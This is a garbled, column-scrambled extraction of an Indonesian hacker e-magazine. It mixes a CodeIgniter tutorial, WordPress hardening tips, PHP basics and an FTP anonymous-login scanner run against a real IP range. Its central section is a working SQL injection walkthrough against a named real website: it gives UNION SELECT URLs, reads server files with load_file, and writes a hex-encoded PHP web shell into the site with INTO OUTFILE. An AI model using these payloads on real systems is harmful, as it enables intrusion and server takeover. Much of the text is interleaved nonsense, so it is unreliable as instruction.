instalasi selesai renema folder Ci
menjadi absen kemudian buka di browser $config['base_url'] =
dengan alamat http://localhost/absen 'http://localhost/mywork/absen/';
jika tulisan welcome terlihat,maka
$config['encryption_key'] =
instalasi sudah benar.
'devilzc0de_is_rock';
$config['global_xss_filtering'] = TRUE;
Setelah instalasi selesai tahapan
selajutnya adalah mengatur konfigurasi –
konfigurasi untuk kebutuhan kita, That’s it, sampai disini kita sudah
konfigurasi CI berada di folder beres melakukan konfigurasi terhadap
application/config file config.php
$config['base_url'] =
'http://localhost/mywork/absen/'; $autoload['libraries'] =
array('database','table','session','form
_validation','pagination');
Karena dalam aplikasi ini kita $autoload['helper'] =
menggunakan session maka kita harus array('url','form');
mengatur 'encryption_key'
Konfigurasi routes.php
() dari aplikasi
$config['encryption_key'] = File ini berada di
'devilzc0de_is_rock'; application/config/route.php, disini
kita akan mengatur controller mana saja
yang akan kita panggil saat pertama kali
aplikasi di jalankan, atau untuk
Dan untuk memudahkan kita dalam proteksi
mengatur perubahan pemanggilan nama
aplikasi, kita bisa mengaktifkan fitur
controller dengan alias tertentu agar
XSS_SECURE,
lebih SEO (katanya sih gitu).
dengan begitu kita tidak perlu khawatir
$route['default_controller'] = "absen";
lagi akan serangan berbentuk XSS
Dengan begitu, berarti controller yang
pertama kali di jalankan adalah
$config['global_xss_filtering'] = TRUE; controller dengan nama “absen”
if(!$this->session-
>userdata('devilzc0de')): <!DOCTYPE html>
} <script type="text/javascript"
src="<?=base_url();?>asset/js/jquery.too
}
ls.min.js"></script>
?>
<script type="text/javascript"
src="<?=base_url();?>asset/js/cufon-
yui.js"></script>
Ingat,nama controller harus di mulai
dengan huruf kapital, pada script di <script
atas terdapat variable $data[] dalam
type="text/javascript"></script>
bentuk larik (array) yang akan kita
tampilkan di halaman
src="<?=base_url();?>asset/js/Amazone_BT <li><?=anchor('rekap','Rekap
_italic_400.font.js" Absensi');?></li>
<script <li><?=anchor('login/user','Ganti
src="<?=base_url();?>asset/js/Qlassik_TB Password');?></li>
-cufon.js"
type="text/javascript"></script> <li><?=anchor('login/logout','Logout');?
></li>
<script type="text/javascript">
</ul>
$(function(){
</div>
Cufon.replace('#header h1', {
fontFamily: 'Amazone BT' }); <?php endif?>
</script> <?=base_url();?>
<li><?=anchor('kelas','Data </html>
Kelas');?></li>
kita atur di dalam controller, kemudian buat sebuah file dengan nama login.php
script di folder application/controller/ kedua
file ini akan saling berinterakasi,
<?=form_open('login/auth','id="loginform controller login akan mengahandle setiap
"');?> control untuk keperluan login,sedangkan
user_model.php akan handle semua urusan
Kita membuat sebuah form dengan action
yang berhubungan dengan database query,
yang menuju controller dengan nama login
pada file user_model.php ketikan script
dan function auth dan form ditutup
berikut:
dengan script :
<?php if ( ! defined('BASEPATH'))
<?=form_close();?>
exit('No direct script access allowed');
Untuk validasi form selain menggunakan
class User_model extends CI_Model
server side validation (validasi dari
sisi server) kita juga menggunakan {
fasilitas dari HTML5 sebagai client side
validation(validasi dari sisi client), function __construct()
ini dimaksudkan agar browser yang tidak
mendukung teknologi HTML5 kita tapi {
dapat melakukan validasi dari sisi
parent::__construct();
server(server side validation), untuk
style tidak usah di pikirkan, diakhir }
segmen kita akan membahasnya. Sekarang
coba jalankan aplikasi kita dengan function login()
mengaskes alamat
{
http://localhost/absen maka hasilnya
seperti berikut $this->db->where('username',$this-
>input->post('username'));
$this->db->where('password',sha1($this-
>input->post('password')));
$query = $this->db->get('dev_user');
if($query->num_rows == 1){
return $query->result();
{ $this->session-
>set_flashdata('message','<p
parent::__construct(); class="error">Mohon
$this->form_validation- {
>set_rules('password', 'Password',
'trim|required'); $this->session->sess_destroy();
if ($this->form_validation->run() == redirect('absen','refresh');
FALSE)
}
{
}
$data['title'] = 'Sistem Informasi
Pengolahan Data Absensi Siswa'; ?>
$data['kontent'] = 'login';
foreach($login as $data): {
$this->form_validation-
Script tersebut berfungsi untuk
>set_rules('password', 'Password',
menamilkan pesan kesalahan jika terjadi
'trim|required');
kesalahan dalam login, username dan
password tidak ditemukan dalam database
dan membawa kita kembali pada halaman
Script tersebut digunakan untuk validasi login.
dari sisi server dengan option trim,
required yang artinya tidak boleh function logout()
kosong, dan menghilangkan semua tag html
if ($this->form_validation->run() ==
FALSE)
$data['kontent'] = 'login';
$this->load->view('template', $data);
$login = $this->user_model->login();
if($login){
foreach($login as $data):
$sessi = array(
'level'=>'admin',
'username'=>$data->username,
'nama'=>$data->nama_petugas,
'devilzc0de'=>true
);
endforeach;
$this->session->set_userdata($sessi);
redirect('absen','refresh');
absen $data[‘kontent’] = ‘absen’; $this- Dan letakan dalam folder asset/js/ dalam
>load->view(‘template’ , $data); aplikasi kita bisa melihatnya pada file
header.php di folder
untuk itu kita membutuhkan satu buah application/views/header.php
file dengan nama absen.php yang letaknya
dalam folder views, buat sebuah file <link rel='stylesheet' type='text/css'
dengan nama absen.php di folder href='<?=base_url();?>asset/css/style.cs
application/views/ kemudian ketikan s' />
script berikut:
<script type="text/javascript"
<h1>Selamat Datang <?=$this->session- src="<?=base_url();?>asset/js/jquery.too
>userdata('nama');?></h1> ls.min.js"></script>
<script
src="<?=base_url();?>asset/js/Qlassik_TB
-cufon.js"
type="text/javascript"></script>
<script type="text/javascript">
$(function(){
Cufon.replace('#header h1', {
fontFamily: 'Amazone BT' });
$("#menu a[title]").tooltip();
});
</script>
Tampilan halaman Utama setelah Login
behasil
Thanks to:
devilzc0de.org whitecyber.net,
Tampilan jika terjadi kesalahan dalam jasakom.com, anti jasakom.com and you.
proses Login
Special for => My Parent: Ibunda &
Ayahanda
Oleh: Tempe.Mendoan
2. Secret Key file wp-config.php
yang memunculkan error di file tersebut Jangan lupa ganti wp-login.php menjadi
dan juga masih banyak yang lain nya anda gorengan-tempe.php . Jika anda
bisa mencar sendiri tentunya, tambahkan menginginkan instan nya anda bias
langsung download plugin Stealth Login.
kode di bawah <?php .
Contoh :
6. Plugins Security
<?php
ini_set(“display_errors”, 0);
Untuk melindungi web WP anda dari hal
error_reporting(0);
yang kurang berkenan xixixi, anda bisa
/**
menambahkan beberapa Plugin Security
yang di antaranya di bawah ini tapi saya
tidak menjelaskan deskripsinya karena
5. Privat Login
anda bisa langsung mengunjungi web yang
menyediakan Plugins tersebut.
Halaman untuk login pada WP secara
default adalah “wp-login.php” atau bisa
WordPress Database Backup
melalui “wp-admin” yang nantinya juga
(http://www.ilfilosofo.com/blog/wp-
akan dialihkan ke wp-login.php.Untuk db-backup/)
mengganti default login anda bias Semisecure Login
mengganti missal halam login diganti (http://jamesmallen.net)
dengan gorengan-tempe.php,edit file wp- AskApache Password Protect
login.php terus cari semua kata “wp- (http://www.askapache.com)
login.php” (terdapat 19 kata wp- Force SSL
login.php) ganti kata wp-login.php (http://almosteffortless.com/)
dengan gorengan-tempe.php. WP Security Scan
(http://wordpress.org/extend/plugin
Bukan cuma file wp-login.php saja yang s)
kita harus edit karena kalau hanya file Secure Files
wp-login.php maka ketika anda logout di (http://wordpress.org/extend/plugin
web WP anda akan memunculkan 404 Not s)
Found, nah bagaimana biar bias loguot WP-SpamFree
(http://www.hybrid6.com/)
dengan tenang alias tidak 404 Not Found.
BackUpWordPress
Masuk ke direktori wp-admin dan edit (http://wordpress.designpraxis.at)
file admin-header.php, kemudian lihat Anonymous WordPress Plugin Updates
(http://f00f.de/)
line 126.
Replace WP-Version
(http://wordpress.org/extend/plugin
$links[15] = '| <a href="' .
s/)
wp_logout_url() . '" title="' . __('Log
Out') . '">' . __('Log Out') . '</a>';
Dan ini juga tentunya penting bagi kita Jawabannya ada dikepala kalian masing-masing.
untuk memilih tempat hosting yang kita
inginkan jadi kita tahu hosting yang Berikut kami mengutip dari diskusi dalam salahsatu
kita gunakan aman terhadap serangan thread DC yang dapat dijadikan bahan renungan
hacker, walaupun tidak semua hosting
aman tapi lebih baik kita memilih tempat bersama.
hosting yang memang benar-benar kita
rasa aman untuk security nya. numlock: patch tanpa deface.
Kali ini akan saya perlihatkan contoh Oke, terlihat jelas di gambar kalau
eksploitasi webDAV akibat konfigurasi webDAV enabled. Sekarang mari kita ke
permission yang terlalu ‘bebas’ di sisi target melihat konfigurasinya.
direktori bernama ‘webdav’ pada Konfigurasinya adalah sebagai berikut.
webserver.
Step-by-Step Contoh :
Saya coba re-wrtie Proof Of Concept ini Jika kita telah punya privilege maka
karena, sebelumnya hanya terfokus pada load_file sangat berguna sekali dalam
target alias straight to the Real melakukan penetrasi website. Kita bisa
website. Jadi sekarang saya buat artikel me-load isi sebuah file ke halaman web.
ini menjadi 2 bagian. Perintahnya seperti ini :
Pertama Bersifat teoritical dan kedua select load_file (‘/path/namafile’)
practice ke target web. Contoh :
union all select
Sebenarnya dalam artikel ini ada 2 inti 1,load_file(‘/var/www/site/config.php’),
masalah yang akan dibahas yakni 3--
load_file dan into outfile.
/etc/httpd/httpd.conf http://www.londonsalsa.co.uk/clubNight_d
/etc/apache/apache.conf ips1.php?clubNightID=187
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
Oh ya…disini saya anggap anda sudah
/usr/local/apache2/conf/httpd.conf
familiar dengan basic sql injection.
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf Tools yang di perlukan:
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.incl
ude - Hackbar firefox addon (untuk
mempermudah sqli)
Setelah web directory ditangan langsung lakukan order by sampai muncul error
saja coba write file ke directory yang Unknown column in 'order clause'
writable. Jika directory tidak writable
saya coba order by 32 baru muncul error,
coba cari directory image atau upload
berarti count column ada 31.
directory biasanya kedua directory ini
writable. perintahnya seperti ini. http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187/**/order/**/by/
Select ‘isi code’ into outfile
**/31--
‘/path/namafile’
Contoh :
Union all select 1, UNION SELECT
1,0x3c3f696e636c75646528245f4745545b2263 2. UNION ALL SELECT
6d64225d293b3f3e,3 INTO OUTFILE
'/var/www/public_html/shell.php'—-
Cari Column yang bisa retrieve data
dengan perintah union all select
*KETERANGAN :
code hexa diatas adalah hasil conversi http://www.londonsalsa.co.uk/clubNight_d
<?include($_GET["cmd"]);?> ips1.php?clubNightID=187/**/UNION ALL
SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21,22,23,24,25,26,27,28,29,30
And yeah done, mari kita implementasi ke ,31--
salah satu target yang vulnerable…
di halaman muncul angka 8, 9, 22 berarti
kita bisa lakukan dump data pada salah
[====Some real POC=====]
satu kolom tersebut.
4.Check file_priv
jadinya seperti ini :
http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187%20UNION%20ALL%2
0SELECT%201,2,3,4,5,6,7,file_priv,9,10,1
1,12,13,14,15,16,17,18,19,20,21,22,23,24
,25,26,27,28,29,30,31%20from%20mysql.use
r--
http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187%20UNION%20ALL%2
0SELECT%201,2,3,4,5,6,7,%27check%20sound
%27,9,10,11,12,13,14,15,16,17,18,19,20,2
1,22,23,24,25,26,27,28,29,30,31%20into%2
0outfile%20%27/home2/salsamov/public_htm
l/londonsalsa/tmp/cek.php%27--
*Keterangan :
http://www.londonsalsa.co.uk/clubNight_d
ips1.php?clubNightID=187/**/UNION/**/ALL
/**/SELECT/**/1,2,3,4,5,6,7,load_file(0x
2f686f6d65322f73616c73616d6f762f7075626c
69635f68746d6c2f6c6f6e646f6e73616c73612f
6e6577734c697374696e67732e706870),9,10,1
1,12,13,14,15,16,17,18,19,20,21,22,23,24
,25,26,27,28,29,30,31--
9. Upload shell
(Nofia Fitri)
Oke, cukup intronya..(dari tadi prasaan 1. Tentunya mental dulu donk (oke ini
gak cukup2 deh) lebay)
Oke,, kali ini beneran cukup ..(kapan 2. Sebuah PC punya sendiri (saya tau,
cukupnya ?!??) saya tau, ini gak perlu dibahas, tapi
ini penting)
Langsung aja ya …
3. *okeoke saya serius sekarang, yang
pertama adalah Web Server, seperti
Baiklah pada postingan kali ini saya Apache atau IIS: Internet
akan menyampaikan sedikit tentang PHP.
Information Service, Anda bisa
PHP: Hypertext Preprocessor adalah suatu
mendownload Apache
bahasa pemrograman web yang biasanya
di http://www.apache.com.
disisipkan dalam html yang berguna untuk
membuat website yang dinamis (menurut Memang apa sih gunanaya web server?
saya). Kalo mau lebih lengkapnya
silahkan anda ke: Anda gak perlu tau itu, itu ga penting,
kalo anda mau tau googling saja
http://php.net, (sebenarnya saya gak tau :P)
di http://id.wikipedia.org/wiki/php,
4. *Yang dibutuhkan selanjutnya adalah
atau lebih komplit modul PHP yang bisa anda download
ke http://www.google.co.id aja deh :P . di http://php.net.
6. Editor PHP, anda bisa menggunakan tidak terlalu jauh berbeda dengan
software seperti dreamweaver, php penulisan dalam bahasa pemrograman C,
designer atau php editor ataupun jadi buat anda yang pernah belajar
notepad. Googling aja ya, mudah kok bahasa C atau C++ saya rasa anda tidak
dapatnya, kalo emank males pake notepad lagi sulit dalam penulisannya. Perbedaan
aja (why not?). bahasa PHP dengan bahasa pemrograman
lainnya, dalam bahasa pemrograman php
7. Sebuah web browser seperti Internet tidak perlu adanya pendeklarasian
Explorer, Firefox, Thunderbird, Google variable.
Chrome, dan lainnya.
NB: *untuk nomor 3, 4 dan 5 saya 1. Dalam memulai php (baik yg disisipkan
sarankan anda lebih baik mendownload dalam html atau tidak), selalu diawali
software yang sudah mencakup semua itu,
dengan syntax
biar ga ribet, contohnya seperti XAMPP,
Appserv, PHPTriad dan lainnya, karena PHP Code:
didalamnya sudah mencakup (Apache,
MySQL, PHP, PhpMyAdmin), anda bisa <?php
mendownload XAMPP di
http://apachefriends.org/en/xampp-
windows.html atau bisa juga
http://appservnetwork.com <?
Untuk selanjutnya sekarang kita masuk ke Dan pada akhirnya ditutup dengan syntax:
syntax-syntax dasar dalam pemrograman
PHP. PHP Code:
PHP Code:
echo " mari membuat komentar";
<html>
<head> // ini juga komentar satu baris
</head> // bisa juga buat satu baris lagi
<body> ?>
<?php lalu jalankan seperti biasa ..
echo "Hello World";
?> NB: komentar tidak akan dieksekusi, jadi
</body> tidak akan terlihat saat anda
</html> menjalankannya.
Simpanlah dengan nama helloworldhtml.php Oke, saya rasa kali ini cukup dulu basic
di htdocs. tutorial dari saya, untuk tahap
selanjutnya nanti saya lanjutin di forum
NB: (walaupun file php gabung html ..
ekstensi nya tetap .php atau .php3)
55
a
l e
uIn
b I g r
a k
a h
s u
t
iie d n
ds & u
iers .
<li><a href='http://devilzc0detemplate.blogspot.com'><img
m s t e
) o
ne2 t e t
edit html > Expand Template Widget > dan cari code ini
t k n p a
i a a u a s l
/*------------18-8-2011---------------------------------------------------------*/
gl el t k g p
n pk mp n k o
l m
im ge U u b e
aTen T . s . T
_
y a a a
m . . e e
asy n y r i t d )
s u a n u e r a 0 i
Devilzc0de Blog Special Template
r l n
3na a
o u
k e
t
l
a
g
g
i
d p
m
c
z i
#b l s
a a l o n e l n
ene r : l
p t l
b e
s t j
l i
v a
n akm e t m a e
d 1 e k
i
ik
z h u e b t a 0 9 D s
E ha
a n k
i ) t o
s i
d d
n c b
o /
L a
bd gi r g e e a z
l p C s
i
am u e g l r i t l l
ye n b i i e n u i b
/*-------------------------------- My Imajinasion
“Independence C0DES, DC Backs to Holy”
n s i i d f g o . n v
e 0 _ a a
ar a i g c . e d f U e
r y
n
d
a es ng a , i o i a m / m Q e n
plea g r d l v y / 3 P m a
&ae y a
b e
t n b a
f n
u n
a : l
l /
e k m
ys u e t a i n g p
t ? l h k a
Ia s i k d i e n t / i a
l u
s e
T
RSm t a w k s m e m f
=========================
ua a t a l d h o / e a
Ti.el y , t m d t c m t m r
U n k e t a i i : : . o g s e
d
Hgb o
a g n
a o
o l h o
l d
e a
u e
r c
. n a 0
irbjabl h b i t p g s i d a t
a c
z
t a e d e u n e f e y
( l
abea t b c ) g e s a r r i
g a m an
f d d i m i a a e v
nam
i au a
t (co a
d i
w d k k
n d d
e h
s i a e
rnytamb i u a u i o m 4 f
o h
C d
e r s. s d s t l a . . : N l
pkr m
m i e e u
t i(
h d i n l w w o g l
e a p i xt c. a
y
a b u i
t
n
w w
w
w
w T k
a n
a A
mb r f sbo e Dn2 n l a
y t n o
D / / z K B &
kag a a
j k uatargoai t
p a
g n u
k a
g /
: /
: k
u s n u l i g o i o k p p n - - -
tuaaYbl t p
GhChSoLl r n g r n m n t t a
n
Up( e n
u - - - - & c
S i
t o
l e
B a
D e
D i
L t
h t
h h
T
“Independence C0DES, DC Backs to Holy”
Assalamualaikum. Wr. Wb
Cara Pembuatanya
6.masukin kdalem Kolomnya trus Klik save ngetik commandnya dari hengpon
setting ane...
--------------------------------------------------------
Fungsi
Manfaat
dengan menggunakan tools membantu para system administrator, dan web developer untuk
mengecek apakah user default "anonymous" masih dapat login terhadap server FTP yang
sudah terinstall FTP dalam server UNIX, LINUX, dan Windowsnya
Cara Menggunakan
whitecyber@whitecyber-server:~/Desktop/whitecyberc0de/scanners$
./wtcanonymousftppentest.py
Contoh Penggunaan
whitecyber@whitecyber-server:~/Desktop/whitecyberc0de/scanners$
./wtcanonymousftppentest.py 173.236.56.106-200
[ Scanning 173.236.56.106-200 ]
Hasil
Rupanya jaringan yang kita scan masih menggunakan user default "anonymous" sehingga
dapat dimasuki.
Kita coba menggunakan filezilla untuk masuk menggunakan user "anonymous" password
(diisi apa saja. hasilnya adalah seperti ini
Semoga dengan ini administrator dapat merubah user default untuk dirubah menjadi
lebih aman.
Download
http://www.ziddu.com/download/16193541/wtcanonymousftppentest.py.zip.html
Tahukah engkau, apa yang sudah kau hasilkan? Aku sadar apa yang terjadi adalah
ketertindasan, aku terjerambab dalam ruang
…..kode-kode baru yang telah merubah
susunan jiwaku bisu terkepung rasa bersalah, feeling ku menjadi
tumpul sementara instingku melebur menjadi
serpihan-serpihan debu, tertiup angin, hilang
Tahukan engkau apa yang sudah kau perintahkan? terhisap udara. Kutemukan nalarku melepuh
….Logcleaner fikiranku, hapus masalaluku, karena setiap makna yang kutemukan
kini engkau dalam perhatianku. membakar seisi kepala, hampir
membumihanguskannya. Jika kebodohanku itu
Devilz REGARDS
Devilz Regards : “Makasih om atas kerja Devilz Regards : “Ane terlalu sangat ganteng
kerasnya kalau bukan karena ente gak bakal dan hacker keren neng, gimana kalau abis lebaran
terealisasi ini e-magazine edisi transisi apalagi ane exploit hati neng aja, soalnya ane abis diputusin
si layouternya kelamaan liburan summer”… :D
pacar ane gara-gara kebanyakan hacking computer.
Announcement
Devilz
Kami mengapresiasi kerja Devilz E-Magazine TEAM Pemred Seniman Maya Impressi Maha Metal
(DeMT), para petarung maya atas released nya edisi “Schumbag”
(Sang Hacker Stock Ganteng Terakhir :P)
transisi ini.
Devilzc0de
(We Are Coder, We Are an EXPLOIT)
INDONESIA